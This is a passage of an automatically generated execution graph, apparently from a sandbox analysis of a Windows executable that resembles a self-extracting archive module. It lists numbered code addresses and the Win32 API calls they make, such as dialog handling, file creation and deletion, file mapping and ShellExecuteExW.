                                                                                                                                                                                              execution_graph 25285 fc2cfb 38 API calls 4 library calls 25322 fa95f0 80 API calls 25323 fbfd4f 9 API calls 2 library calls 25348 fa5ef0 82 API calls 23364 fc98f0 23372 fcadaf 23364->23372 23368 fc990c 23369 fc9919 23368->23369 23380 fc9920 11 API calls 23368->23380 23371 fc9904 23381 fcac98 23372->23381 23375 fcadee TlsAlloc 23376 fcaddf 23375->23376 23388 fbfbbc 23376->23388 23378 fc98fa 23378->23371 23379 fc9869 20 API calls 2 library calls 23378->23379 23379->23368 23380->23371 23382 fcacc8 23381->23382 23385 fcacc4 23381->23385 23382->23375 23382->23376 23383 fcace8 23383->23382 23386 fcacf4 GetProcAddress 23383->23386 23385->23382 23385->23383 23395 fcad34 23385->23395 23387 fcad04 _abort 23386->23387 23387->23382 23389 fbfbc5 IsProcessorFeaturePresent 23388->23389 23390 fbfbc4 23388->23390 23392 fbfc07 23389->23392 23390->23378 23402 fbfbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23392->23402 23394 fbfcea 23394->23378 23396 fcad55 LoadLibraryExW 23395->23396 23397 fcad4a 23395->23397 23398 fcad8a 23396->23398 23399 fcad72 GetLastError 23396->23399 23397->23385 23398->23397 23401 fcada1 FreeLibrary 23398->23401 23399->23398 23400 fcad7d LoadLibraryExW 23399->23400 23400->23398 23401->23397 23402->23394 23403 fcabf0 23405 fcabfb 23403->23405 23406 fcac24 23405->23406 23407 fcac20 23405->23407 23409 fcaf0a 23405->23409 23416 fcac50 DeleteCriticalSection 23406->23416 23410 fcac98 _abort 5 API calls 23409->23410 23411 fcaf31 23410->23411 23412 fcaf4f InitializeCriticalSectionAndSpinCount 23411->23412 23413 fcaf3a 23411->23413 23412->23413 23414 fbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23413->23414 23415 fcaf66 23414->23415 23415->23405 23416->23407 25286 fc88f0 7 API calls ___scrt_uninitialize_crt 25325 faf1e8 FreeLibrary 23501 fbb7e0 23502 fbb7ea __EH_prolog 23501->23502 23669 fa1316 23502->23669 23505 fbb841 23506 fbb82a 23506->23505 23509 fbb89b 23506->23509 23510 fbb838 23506->23510 23507 fbbf0f 23748 fbd69e 23507->23748 23512 fbb92e GetDlgItemTextW 23509->23512 23520 fbb8b1 23509->23520 23513 fbb878 23510->23513 23514 fbb83c 23510->23514 23512->23513 23519 fbb96b 23512->23519 23513->23505 23523 fbb95f KiUserCallbackDispatcher 23513->23523 23514->23505 23521 fae617 53 API calls 23514->23521 23515 fbbf2a SendMessageW 23516 fbbf38 23515->23516 23517 fbbf52 GetDlgItem SendMessageW 23516->23517 23518 fbbf41 SendDlgItemMessageW 23516->23518 23766 fba64d GetCurrentDirectoryW 23517->23766 23518->23517 23524 fbb980 GetDlgItem 23519->23524 23667 fbb974 23519->23667 23525 fae617 53 API calls 23520->23525 23526 fbb85b 23521->23526 23523->23505 23528 fbb9b7 SetFocus 23524->23528 23529 fbb994 SendMessageW SendMessageW 23524->23529 23530 fbb8ce SetDlgItemTextW 23525->23530 23788 fa124f SHGetMalloc 23526->23788 23527 fbbf82 GetDlgItem 23532 fbbf9f 23527->23532 23533 fbbfa5 SetWindowTextW 23527->23533 23534 fbb9c7 23528->23534 23546 fbb9e0 23528->23546 23529->23528 23535 fbb8d9 23530->23535 23532->23533 23767 fbabab GetClassNameW 23533->23767 23539 fae617 53 API calls 23534->23539 23535->23505 23542 fbb8e6 GetMessageW 23535->23542 23536 fbb862 23536->23505 23545 fbc1fc SetDlgItemTextW 23536->23545 23537 fbbe55 23540 fae617 53 API calls 23537->23540 23543 fbb9d1 23539->23543 23547 fbbe65 SetDlgItemTextW 23540->23547 23542->23505 23549 fbb8fd IsDialogMessageW 23542->23549 23789 fbd4d4 23543->23789 23545->23505 23553 fae617 53 API calls 23546->23553 23554 fbbe79 23547->23554 23549->23535 23550 fbb90c TranslateMessage DispatchMessageW 23549->23550 23550->23535 23552 fbb9d9 23679 faa0b1 23552->23679 23555 fbba17 23553->23555 23556 fae617 53 API calls 23554->23556 23560 fa4092 _swprintf 51 API calls 23555->23560 23588 fbbe9c _wcslen 23556->23588 23557 fbbff0 23559 fbc020 23557->23559 23563 fae617 53 API calls 23557->23563 23568 fbc73f 97 API calls 23559->23568 23620 fbc0d8 23559->23620 23564 fbba29 23560->23564 23561 fbc73f 97 API calls 23561->23557 23567 fbc003 SetDlgItemTextW 23563->23567 23570 fbd4d4 16 API calls 23564->23570 23565 fbba73 23685 fbac04 SetCurrentDirectoryW 23565->23685 23566 fbba68 GetLastError 23566->23565 23571 fae617 53 API calls 23567->23571 23573 fbc03b 23568->23573 23569 fbc18b 23574 fbc19d 23569->23574 23575 fbc194 EnableWindow 23569->23575 23570->23552 23578 fbc017 SetDlgItemTextW 23571->23578 23586 fbc04d 23573->23586 23611 fbc072 23573->23611 23577 fbc1ba 23574->23577 23807 fa12d3 GetDlgItem EnableWindow 23574->23807 23575->23574 23576 fbbeed 23580 fae617 53 API calls 23576->23580 23583 fbc1e1 23577->23583 23597 fbc1d9 SendMessageW 23577->23597 23578->23559 23579 fbba87 23584 fbba9e 23579->23584 23585 fbba90 GetLastError 23579->23585 23580->23505 23581 fbc0cb 23589 fbc73f 97 API calls 23581->23589 23583->23505 23598 fae617 53 API calls 23583->23598 23590 fbbb11 23584->23590 23593 fbbb20 23584->23593 23599 fbbaae GetTickCount 23584->23599 23585->23584 23805 fb9ed5 32 API calls 23586->23805 23587 fbc1b0 23808 fa12d3 GetDlgItem EnableWindow 23587->23808 23588->23576 23592 fae617 53 API calls 23588->23592 23589->23620 23590->23593 23594 fbbd56 23590->23594 23600 fbbed0 23592->23600 23602 fbbcfb 23593->23602 23603 fbbb39 GetModuleFileNameW 23593->23603 23604 fbbcf1 23593->23604 23704 fa12f1 GetDlgItem ShowWindow 23594->23704 23595 fbc066 23595->23611 23597->23583 23598->23536 23686 fa4092 23599->23686 23607 fa4092 _swprintf 51 API calls 23600->23607 23601 fbc169 23806 fb9ed5 32 API calls 23601->23806 23610 fae617 53 API calls 23602->23610 23799 faf28c 82 API calls 23603->23799 23604->23513 23604->23602 23607->23576 23617 fbbd05 23610->23617 23611->23581 23618 fbc73f 97 API calls 23611->23618 23612 fbbd66 23705 fa12f1 GetDlgItem ShowWindow 23612->23705 23613 fbbac7 23689 fa966e 23613->23689 23614 fae617 53 API calls 23614->23620 23615 fbc188 23615->23569 23616 fbbb5f 23621 fa4092 _swprintf 51 API calls 23616->23621 23622 fa4092 _swprintf 51 API calls 23617->23622 23623 fbc0a0 23618->23623 23620->23569 23620->23601 23620->23614 23626 fbbb81 CreateFileMappingW 23621->23626 23627 fbbd23 23622->23627 23623->23581 23628 fbc0a9 DialogBoxParamW 23623->23628 23624 fbbd70 23706 fae617 23624->23706 23631 fbbbe3 GetCommandLineW 23626->23631 23663 fbbc60 __InternalCxxFrameHandler 23626->23663 23641 fae617 53 API calls 23627->23641 23628->23513 23628->23581 23630 fbbaed 23634 fbbaff 23630->23634 23635 fbbaf4 GetLastError 23630->23635 23636 fbbbf4 23631->23636 23697 fa959a 23634->23697 23635->23634 23800 fbb425 SHGetMalloc 23636->23800 23637 fbbc6b ShellExecuteExW 23658 fbbc88 23637->23658 23638 fbbd8c SetDlgItemTextW GetDlgItem 23642 fbbda9 GetWindowLongW SetWindowLongW 23638->23642 23643 fbbdc1 23638->23643 23645 fbbd3d 23641->23645 23642->23643 23711 fbc73f 23643->23711 23644 fbbc10 23801 fbb425 SHGetMalloc 23644->23801 23649 fbbc1c 23802 fbb425 SHGetMalloc 23649->23802 23650 fbbccb 23650->23604 23656 fbbce1 UnmapViewOfFile CloseHandle 23650->23656 23651 fbc73f 97 API calls 23653 fbbddd 23651->23653 23736 fbda52 23653->23736 23654 fbbc28 23803 faf3fa 82 API calls 2 library calls 23654->23803 23656->23604 23658->23650 23661 fbbcb7 Sleep 23658->23661 23660 fbbc3f MapViewOfFile 23660->23663 23661->23650 23661->23658 23662 fbc73f 97 API calls 23666 fbbe03 23662->23666 23663->23637 23664 fbbe2c 23804 fa12d3 GetDlgItem EnableWindow 23664->23804 23666->23664 23668 fbc73f 97 API calls 23666->23668 23667->23513 23667->23537 23668->23664 23670 fa1378 23669->23670 23671 fa131f 23669->23671 23810 fae2c1 GetWindowLongW SetWindowLongW 23670->23810 23673 fa1385 23671->23673 23809 fae2e8 62 API calls 2 library calls 23671->23809 23673->23505 23673->23506 23673->23507 23675 fa1341 23675->23673 23676 fa1354 GetDlgItem 23675->23676 23676->23673 23677 fa1364 23676->23677 23677->23673 23678 fa136a SetWindowTextW 23677->23678 23678->23673 23680 faa0bb 23679->23680 23681 faa14c 23680->23681 23683 faa175 23680->23683 23811 faa2b2 23680->23811 23682 faa2b2 8 API calls 23681->23682 23681->23683 23682->23683 23683->23565 23683->23566 23685->23579 23849 fa4065 23686->23849 23690 fa9678 23689->23690 23691 fa96d5 CreateFileW 23690->23691 23692 fa96c9 23690->23692 23691->23692 23693 fabb03 GetCurrentDirectoryW 23692->23693 23694 fa971f 23692->23694 23695 fa9704 23693->23695 23694->23630 23695->23694 23696 fa9708 CreateFileW 23695->23696 23696->23694 23698 fa95be 23697->23698 23699 fa95cf 23697->23699 23698->23699 23700 fa95ca 23698->23700 23701 fa95d1 23698->23701 23699->23590 23928 fa974e 23700->23928 23933 fa9620 23701->23933 23704->23612 23705->23624 23707 fae627 23706->23707 23948 fae648 23707->23948 23710 fa12f1 GetDlgItem ShowWindow 23710->23638 23712 fbc749 __EH_prolog 23711->23712 23718 fbbdcf 23712->23718 23971 fbb314 23712->23971 23715 fbb314 ExpandEnvironmentStringsW 23725 fbc780 _wcslen _wcsrchr 23715->23725 23716 fbca67 SetWindowTextW 23716->23725 23718->23651 23722 fbc855 SetFileAttributesW 23724 fbc90f GetFileAttributesW 23722->23724 23735 fbc86f _abort _wcslen 23722->23735 23724->23725 23727 fbc921 DeleteFileW 23724->23727 23725->23715 23725->23716 23725->23718 23725->23722 23728 fbcc31 GetDlgItem SetWindowTextW SendMessageW 23725->23728 23731 fbcc71 SendMessageW 23725->23731 23975 fb1fbb CompareStringW 23725->23975 23976 fba64d GetCurrentDirectoryW 23725->23976 23978 faa5d1 6 API calls 23725->23978 23979 faa55a FindClose 23725->23979 23980 fbb48e 76 API calls 2 library calls 23725->23980 23981 fc3e3e 23725->23981 23727->23725 23729 fbc932 23727->23729 23728->23725 23730 fa4092 _swprintf 51 API calls 23729->23730 23732 fbc952 GetFileAttributesW 23730->23732 23731->23725 23732->23729 23733 fbc967 MoveFileW 23732->23733 23733->23725 23734 fbc97f MoveFileExW 23733->23734 23734->23725 23735->23724 23735->23725 23977 fab991 51 API calls 2 library calls 23735->23977 23737 fbda5c __EH_prolog 23736->23737 24005 fb0659 23737->24005 23739 fbda8d 24009 fa5b3d 23739->24009 23741 fbdaab 24013 fa7b0d 23741->24013 23745 fbdafe 24029 fa7b9e 23745->24029 23747 fbbdee 23747->23662 23749 fbd6a8 23748->23749 24512 fba5c6 23749->24512 23752 fbd6b5 GetWindow 23753 fbbf15 23752->23753 23756 fbd6d5 23752->23756 23753->23515 23753->23516 23754 fbd6e2 GetClassNameW 24517 fb1fbb CompareStringW 23754->24517 23756->23753 23756->23754 23757 fbd76a GetWindow 23756->23757 23758 fbd706 GetWindowLongW 23756->23758 23757->23753 23757->23756 23758->23757 23759 fbd716 SendMessageW 23758->23759 23759->23757 23760 fbd72c GetObjectW 23759->23760 24518 fba605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23760->24518 23762 fbd743 24519 fba5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23762->24519 24520 fba80c 8 API calls 23762->24520 23765 fbd754 SendMessageW DeleteObject 23765->23757 23766->23527 23768 fbabcc 23767->23768 23769 fbabf1 23767->23769 24523 fb1fbb CompareStringW 23768->24523 23770 fbabff 23769->23770 23771 fbabf6 SHAutoComplete 23769->23771 23775 fbb093 23770->23775 23771->23770 23773 fbabdf 23773->23769 23774 fbabe3 FindWindowExW 23773->23774 23774->23769 23776 fbb09d __EH_prolog 23775->23776 23777 fa13dc 84 API calls 23776->23777 23778 fbb0bf 23777->23778 24524 fa1fdc 23778->24524 23781 fbb0eb 23784 fa19af 128 API calls 23781->23784 23782 fbb0d9 23783 fa1692 86 API calls 23782->23783 23785 fbb0e4 23783->23785 23787 fbb10d __InternalCxxFrameHandler ___std_exception_copy 23784->23787 23785->23557 23785->23561 23786 fa1692 86 API calls 23786->23785 23787->23786 23788->23536 24532 fbb568 PeekMessageW 23789->24532 23792 fbd536 SendMessageW SendMessageW 23794 fbd572 23792->23794 23795 fbd591 SendMessageW SendMessageW SendMessageW 23792->23795 23793 fbd502 23796 fbd50d ShowWindow SendMessageW SendMessageW 23793->23796 23794->23795 23797 fbd5e7 SendMessageW 23795->23797 23798 fbd5c4 SendMessageW 23795->23798 23796->23792 23797->23552 23798->23797 23799->23616 23800->23644 23801->23649 23802->23654 23803->23660 23804->23667 23805->23595 23806->23615 23807->23587 23808->23577 23809->23675 23810->23673 23812 faa2bf 23811->23812 23813 faa2e3 23812->23813 23814 faa2d6 CreateDirectoryW 23812->23814 23832 faa231 23813->23832 23814->23813 23816 faa316 23814->23816 23818 faa325 23816->23818 23824 faa4ed 23816->23824 23818->23680 23819 faa329 GetLastError 23819->23818 23822 faa2ff 23822->23819 23823 faa303 CreateDirectoryW 23822->23823 23823->23816 23823->23819 23839 fbec50 23824->23839 23827 faa53d 23827->23818 23828 faa510 23829 fabb03 GetCurrentDirectoryW 23828->23829 23830 faa524 23829->23830 23830->23827 23831 faa528 SetFileAttributesW 23830->23831 23831->23827 23841 faa243 23832->23841 23835 fabb03 23836 fabb10 _wcslen 23835->23836 23837 fabbb8 GetCurrentDirectoryW 23836->23837 23838 fabb39 _wcslen 23836->23838 23837->23838 23838->23822 23840 faa4fa SetFileAttributesW 23839->23840 23840->23827 23840->23828 23842 fbec50 23841->23842 23843 faa250 GetFileAttributesW 23842->23843 23844 faa23a 23843->23844 23845 faa261 23843->23845 23844->23819 23844->23835 23846 fabb03 GetCurrentDirectoryW 23845->23846 23847 faa275 23846->23847 23847->23844 23848 faa279 GetFileAttributesW 23847->23848 23848->23844 23850 fa407c __vsnwprintf_l 23849->23850 23853 fc5fd4 23850->23853 23856 fc4097 23853->23856 23857 fc40bf 23856->23857 23858 fc40d7 23856->23858 23873 fc91a8 20 API calls _abort 23857->23873 23858->23857 23859 fc40df 23858->23859 23875 fc4636 23859->23875 23862 fc40c4 23874 fc9087 26 API calls _abort 23862->23874 23865 fc40cf 23866 fbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23865->23866 23868 fa4086 23866->23868 23868->23613 23869 fc4167 23884 fc49e6 51 API calls 3 library calls 23869->23884 23872 fc4172 23885 fc46b9 20 API calls _free 23872->23885 23873->23862 23874->23865 23876 fc4653 23875->23876 23882 fc40ef 23875->23882 23876->23882 23886 fc97e5 GetLastError 23876->23886 23878 fc4674 23906 fc993a 38 API calls __cftof 23878->23906 23880 fc468d 23907 fc9967 38 API calls __cftof 23880->23907 23883 fc4601 20 API calls 2 library calls 23882->23883 23883->23869 23884->23872 23885->23865 23887 fc97fb 23886->23887 23891 fc9801 23886->23891 23908 fcae5b 11 API calls 2 library calls 23887->23908 23893 fc9850 SetLastError 23891->23893 23909 fcb136 23891->23909 23892 fc981b 23916 fc8dcc 23892->23916 23893->23878 23896 fc9830 23896->23892 23898 fc9837 23896->23898 23897 fc9821 23899 fc985c SetLastError 23897->23899 23923 fc9649 20 API calls _abort 23898->23923 23924 fc8d24 38 API calls _abort 23899->23924 23902 fc9842 23904 fc8dcc _free 20 API calls 23902->23904 23905 fc9849 23904->23905 23905->23893 23905->23899 23906->23880 23907->23882 23908->23891 23914 fcb143 _abort 23909->23914 23910 fcb183 23926 fc91a8 20 API calls _abort 23910->23926 23911 fcb16e RtlAllocateHeap 23912 fc9813 23911->23912 23911->23914 23912->23892 23922 fcaeb1 11 API calls 2 library calls 23912->23922 23914->23910 23914->23911 23925 fc7a5e 7 API calls 2 library calls 23914->23925 23917 fc8dd7 RtlFreeHeap 23916->23917 23921 fc8e00 __dosmaperr 23916->23921 23918 fc8dec 23917->23918 23917->23921 23927 fc91a8 20 API calls _abort 23918->23927 23920 fc8df2 GetLastError 23920->23921 23921->23897 23922->23896 23923->23902 23925->23914 23926->23912 23927->23920 23929 fa9781 23928->23929 23930 fa9757 23928->23930 23929->23699 23930->23929 23939 faa1e0 23930->23939 23934 fa964a 23933->23934 23935 fa962c 23933->23935 23936 fa9669 23934->23936 23947 fa6bd5 76 API calls 23934->23947 23935->23934 23937 fa9638 CloseHandle 23935->23937 23936->23699 23937->23934 23940 fbec50 23939->23940 23941 faa1ed DeleteFileW 23940->23941 23942 fa977f 23941->23942 23943 faa200 23941->23943 23942->23699 23944 fabb03 GetCurrentDirectoryW 23943->23944 23945 faa214 23944->23945 23945->23942 23946 faa218 DeleteFileW 23945->23946 23946->23942 23947->23936 23954 fad9b0 23948->23954 23951 fae66b LoadStringW 23952 fae645 SetDlgItemTextW 23951->23952 23953 fae682 LoadStringW 23951->23953 23952->23710 23953->23952 23959 fad8ec 23954->23959 23956 fad9cd 23957 fad9e2 23956->23957 23967 fad9f0 26 API calls 23956->23967 23957->23951 23957->23952 23960 fad904 23959->23960 23965 fad984 _strncpy 23959->23965 23962 fad928 23960->23962 23968 fb1da7 WideCharToMultiByte 23960->23968 23966 fad959 23962->23966 23969 fae5b1 50 API calls __vsnprintf 23962->23969 23965->23956 23970 fc6159 26 API calls 3 library calls 23966->23970 23967->23957 23968->23962 23969->23966 23970->23965 23972 fbb31e 23971->23972 23973 fbb3f0 ExpandEnvironmentStringsW 23972->23973 23974 fbb40d 23972->23974 23973->23974 23974->23725 23975->23725 23976->23725 23977->23735 23978->23725 23979->23725 23980->23725 23982 fc8e54 23981->23982 23983 fc8e6c 23982->23983 23984 fc8e61 23982->23984 23986 fc8e74 23983->23986 23992 fc8e7d _abort 23983->23992 23994 fc8e06 23984->23994 23987 fc8dcc _free 20 API calls 23986->23987 23990 fc8e69 23987->23990 23988 fc8ea7 HeapReAlloc 23988->23990 23988->23992 23989 fc8e82 24001 fc91a8 20 API calls _abort 23989->24001 23990->23725 23992->23988 23992->23989 24002 fc7a5e 7 API calls 2 library calls 23992->24002 23995 fc8e44 23994->23995 23999 fc8e14 _abort 23994->23999 24004 fc91a8 20 API calls _abort 23995->24004 23996 fc8e2f RtlAllocateHeap 23998 fc8e42 23996->23998 23996->23999 23998->23990 23999->23995 23999->23996 24003 fc7a5e 7 API calls 2 library calls 23999->24003 24001->23990 24002->23992 24003->23999 24004->23998 24006 fb0666 _wcslen 24005->24006 24033 fa17e9 24006->24033 24008 fb067e 24008->23739 24010 fb0659 _wcslen 24009->24010 24011 fa17e9 78 API calls 24010->24011 24012 fb067e 24011->24012 24012->23741 24014 fa7b17 __EH_prolog 24013->24014 24050 face40 24014->24050 24016 fa7b32 24056 fbeb38 24016->24056 24018 fa7b5c 24065 fb4a76 24018->24065 24021 fa7c7d 24022 fa7c87 24021->24022 24024 fa7cf1 24022->24024 24097 faa56d 24022->24097 24026 fa7d50 24024->24026 24075 fa8284 24024->24075 24025 fa7d92 24025->23745 24026->24025 24103 fa138b 74 API calls 24026->24103 24030 fa7bac 24029->24030 24032 fa7bb3 24029->24032 24031 fb2297 86 API calls 24030->24031 24031->24032 24035 fa17ff 24033->24035 24045 fa185a __InternalCxxFrameHandler 24033->24045 24034 fa1828 24036 fa1887 24034->24036 24042 fa1847 ___std_exception_copy 24034->24042 24035->24034 24046 fa6c36 76 API calls __vswprintf_c_l 24035->24046 24038 fc3e3e 22 API calls 24036->24038 24041 fa188e 24038->24041 24039 fa181e 24047 fa6ca7 75 API calls 24039->24047 24041->24045 24049 fa6ca7 75 API calls 24041->24049 24042->24045 24048 fa6ca7 75 API calls 24042->24048 24045->24008 24046->24039 24047->24034 24048->24045 24049->24045 24051 face4a __EH_prolog 24050->24051 24052 fbeb38 8 API calls 24051->24052 24053 face8d 24052->24053 24054 fbeb38 8 API calls 24053->24054 24055 faceb1 24054->24055 24055->24016 24057 fbeb3d ___std_exception_copy 24056->24057 24058 fbeb57 24057->24058 24060 fbeb59 24057->24060 24071 fc7a5e 7 API calls 2 library calls 24057->24071 24058->24018 24061 fbf5c9 24060->24061 24072 fc238d RaiseException 24060->24072 24073 fc238d RaiseException 24061->24073 24064 fbf5e6 24066 fb4a80 __EH_prolog 24065->24066 24067 fbeb38 8 API calls 24066->24067 24068 fb4a9c 24067->24068 24069 fa7b8b 24068->24069 24074 fb0e46 80 API calls 24068->24074 24069->24021 24071->24057 24072->24061 24073->24064 24074->24069 24076 fa828e __EH_prolog 24075->24076 24104 fa13dc 24076->24104 24078 fa82aa 24079 fa82bb 24078->24079 24244 fa9f42 24078->24244 24082 fa82f2 24079->24082 24112 fa1a04 24079->24112 24240 fa1692 24082->24240 24085 fa8389 24131 fa8430 24085->24131 24088 fa83e8 24136 fa1f6d 24088->24136 24092 fa82ee 24092->24082 24092->24085 24095 faa56d 7 API calls 24092->24095 24248 fac0c5 CompareStringW _wcslen 24092->24248 24093 fa83f3 24093->24082 24140 fa3b2d 24093->24140 24152 fa848e 24093->24152 24095->24092 24098 faa582 24097->24098 24102 faa5b0 24098->24102 24501 faa69b 24098->24501 24100 faa592 24101 faa597 FindClose 24100->24101 24100->24102 24101->24102 24102->24022 24103->24025 24105 fa13e1 __EH_prolog 24104->24105 24106 face40 8 API calls 24105->24106 24107 fa1419 24106->24107 24108 fbeb38 8 API calls 24107->24108 24111 fa1474 _abort 24107->24111 24109 fa1461 24108->24109 24109->24111 24250 fab505 24109->24250 24111->24078 24113 fa1a0e __EH_prolog 24112->24113 24125 fa1a61 24113->24125 24128 fa1b9b 24113->24128 24266 fa13ba 24113->24266 24116 fa1bc7 24269 fa138b 74 API calls 24116->24269 24118 fa3b2d 101 API calls 24122 fa1c12 24118->24122 24119 fa1bd4 24119->24118 24119->24128 24120 fa1c5a 24124 fa1c8d 24120->24124 24120->24128 24270 fa138b 74 API calls 24120->24270 24122->24120 24123 fa3b2d 101 API calls 24122->24123 24123->24122 24124->24128 24130 fa9e80 79 API calls 24124->24130 24125->24116 24125->24119 24125->24128 24126 fa3b2d 101 API calls 24127 fa1cde 24126->24127 24127->24126 24127->24128 24128->24092 24129 fa9e80 79 API calls 24129->24125 24130->24127 24288 facf3d 24131->24288 24133 fa8440 24292 fb13d2 GetSystemTime SystemTimeToFileTime 24133->24292 24135 fa83a3 24135->24088 24249 fb1b66 72 API calls 24135->24249 24137 fa1f72 __EH_prolog 24136->24137 24138 fa1fa6 24137->24138 24293 fa19af 24137->24293 24138->24093 24141 fa3b39 24140->24141 24142 fa3b3d 24140->24142 24141->24093 24151 fa9e80 79 API calls 24142->24151 24143 fa3b4f 24144 fa3b6a 24143->24144 24145 fa3b78 24143->24145 24146 fa3baa 24144->24146 24423 fa32f7 89 API calls 2 library calls 24144->24423 24424 fa286b 101 API calls 3 library calls 24145->24424 24146->24093 24149 fa3b76 24149->24146 24425 fa20d7 74 API calls 24149->24425 24151->24143 24153 fa8498 __EH_prolog 24152->24153 24156 fa84d5 24153->24156 24167 fa8513 24153->24167 24450 fb8c8d 103 API calls 24153->24450 24155 fa84f5 24157 fa84fa 24155->24157 24158 fa851c 24155->24158 24156->24155 24161 fa857a 24156->24161 24156->24167 24157->24167 24451 fa7a0d 152 API calls 24157->24451 24158->24167 24452 fb8c8d 103 API calls 24158->24452 24161->24167 24426 fa5d1a 24161->24426 24163 fa8605 24163->24167 24432 fa8167 24163->24432 24166 fa8797 24168 faa56d 7 API calls 24166->24168 24171 fa8802 24166->24171 24167->24093 24168->24171 24170 fad051 82 API calls 24177 fa885d 24170->24177 24438 fa7c0d 24171->24438 24172 fa8a5f 24179 fa8a6a 24172->24179 24180 fa8ab6 24172->24180 24173 fa8992 24173->24172 24181 fa89e1 24173->24181 24174 fa898b 24455 fa2021 74 API calls 24174->24455 24177->24167 24177->24170 24177->24173 24177->24174 24453 fa8117 84 API calls 24177->24453 24454 fa2021 74 API calls 24177->24454 24178 fa8a4c 24187 fa8b14 24178->24187 24196 fa8ab4 24178->24196 24179->24196 24457 fa7db2 101 API calls 24179->24457 24180->24178 24458 fa7fc0 97 API calls 24180->24458 24181->24178 24183 faa231 3 API calls 24181->24183 24181->24187 24182 fa959a 80 API calls 24182->24167 24189 fa8a19 24183->24189 24184 fa8b82 24188 faab1a 8 API calls 24184->24188 24186 fa959a 80 API calls 24186->24167 24187->24184 24229 fa9105 24187->24229 24459 fa98bc 24187->24459 24191 fa8bd1 24188->24191 24189->24178 24456 fa92a3 97 API calls 24189->24456 24194 faab1a 8 API calls 24191->24194 24209 fa8be7 24194->24209 24196->24182 24198 fa8b70 24463 fa6e98 77 API calls 24198->24463 24200 fa8cbc 24201 fa8d18 24200->24201 24202 fa8e40 24200->24202 24203 fa8d8a 24201->24203 24206 fa8d28 24201->24206 24204 fa8e52 24202->24204 24205 fa8e66 24202->24205 24225 fa8d49 24202->24225 24213 fa8167 19 API calls 24203->24213 24207 fa9215 123 API calls 24204->24207 24208 fb3377 75 API calls 24205->24208 24210 fa8d6e 24206->24210 24217 fa8d37 24206->24217 24207->24225 24211 fa8e7f 24208->24211 24209->24200 24212 fa8c93 24209->24212 24219 fa981a 79 API calls 24209->24219 24210->24225 24466 fa77b8 111 API calls 24210->24466 24469 fb3020 123 API calls 24211->24469 24212->24200 24464 fa9a3c 82 API calls 24212->24464 24216 fa8dbd 24213->24216 24221 fa8de6 24216->24221 24222 fa8df5 24216->24222 24216->24225 24465 fa2021 74 API calls 24217->24465 24219->24212 24467 fa7542 85 API calls 24221->24467 24468 fa9155 93 API calls __EH_prolog 24222->24468 24228 fa8f85 24225->24228 24470 fa2021 74 API calls 24225->24470 24227 fa9090 24227->24229 24231 faa4ed 3 API calls 24227->24231 24228->24227 24228->24229 24230 fa903e 24228->24230 24444 fa9f09 SetEndOfFile 24228->24444 24229->24186 24445 fa9da2 24230->24445 24232 fa90eb 24231->24232 24232->24229 24471 fa2021 74 API calls 24232->24471 24235 fa9085 24237 fa9620 77 API calls 24235->24237 24237->24227 24238 fa90fb 24472 fa6dcb 76 API calls 24238->24472 24241 fa16a4 24240->24241 24488 facee1 24241->24488 24245 fa9f59 24244->24245 24246 fa9f63 24245->24246 24500 fa6d0c 78 API calls 24245->24500 24246->24079 24248->24092 24249->24088 24251 fab50f __EH_prolog 24250->24251 24256 faf1d0 82 API calls 24251->24256 24253 fab521 24257 fab61e 24253->24257 24256->24253 24258 fab630 _abort 24257->24258 24261 fb10dc 24258->24261 24264 fb109e GetCurrentProcess GetProcessAffinityMask 24261->24264 24265 fab597 24264->24265 24265->24111 24271 fa1732 24266->24271 24268 fa13d6 24268->24129 24269->24128 24270->24124 24272 fa1748 24271->24272 24283 fa17a0 __InternalCxxFrameHandler 24271->24283 24273 fa1771 24272->24273 24284 fa6c36 76 API calls __vswprintf_c_l 24272->24284 24274 fa17c7 24273->24274 24280 fa178d ___std_exception_copy 24273->24280 24277 fc3e3e 22 API calls 24274->24277 24276 fa1767 24285 fa6ca7 75 API calls 24276->24285 24279 fa17ce 24277->24279 24279->24283 24287 fa6ca7 75 API calls 24279->24287 24280->24283 24286 fa6ca7 75 API calls 24280->24286 24283->24268 24284->24276 24285->24273 24286->24283 24287->24283 24289 facf54 24288->24289 24290 facf4d 24288->24290 24289->24133 24291 fa981a 79 API calls 24290->24291 24291->24289 24292->24135 24294 fa19bf 24293->24294 24296 fa19bb 24293->24296 24297 fa18f6 24294->24297 24296->24138 24298 fa1908 24297->24298 24299 fa1945 24297->24299 24300 fa3b2d 101 API calls 24298->24300 24305 fa3fa3 24299->24305 24304 fa1928 24300->24304 24304->24296 24306 fa3fac 24305->24306 24307 fa3b2d 101 API calls 24306->24307 24309 fa1966 24306->24309 24322 fb0e08 24306->24322 24307->24306 24309->24304 24310 fa1e50 24309->24310 24311 fa1e5a __EH_prolog 24310->24311 24330 fa3bba 24311->24330 24313 fa1e84 24314 fa1732 78 API calls 24313->24314 24321 fa1f0b 24313->24321 24315 fa1e9b 24314->24315 24358 fa18a9 78 API calls 24315->24358 24317 fa1eb3 24319 fa1ebf _wcslen 24317->24319 24359 fb1b84 MultiByteToWideChar 24317->24359 24360 fa18a9 78 API calls 24319->24360 24321->24304 24323 fb0e0f 24322->24323 24324 fb0e2a 24323->24324 24328 fa6c31 RaiseException _com_raise_error 24323->24328 24326 fb0e3b SetThreadExecutionState 24324->24326 24329 fa6c31 RaiseException _com_raise_error 24324->24329 24326->24306 24328->24324 24329->24326 24331 fa3bc4 __EH_prolog 24330->24331 24332 fa3bda 24331->24332 24333 fa3bf6 24331->24333 24386 fa138b 74 API calls 24332->24386 24335 fa3e51 24333->24335 24338 fa3c22 24333->24338 24403 fa138b 74 API calls 24335->24403 24337 fa3be5 24337->24313 24338->24337 24361 fb3377 24338->24361 24340 fa3ca3 24341 fa3d2e 24340->24341 24357 fa3c9a 24340->24357 24389 fad051 24340->24389 24371 faab1a 24341->24371 24342 fa3c9f 24342->24340 24388 fa20bd 78 API calls 24342->24388 24344 fa3c8f 24387 fa138b 74 API calls 24344->24387 24345 fa3c71 24345->24340 24345->24342 24345->24344 24347 fa3d41 24351 fa3dd7 24347->24351 24352 fa3dc7 24347->24352 24395 fb3020 123 API calls 24351->24395 24375 fa9215 24352->24375 24355 fa3dd5 24355->24357 24396 fa2021 74 API calls 24355->24396 24397 fb2297 24357->24397 24358->24317 24359->24319 24360->24321 24362 fb338c 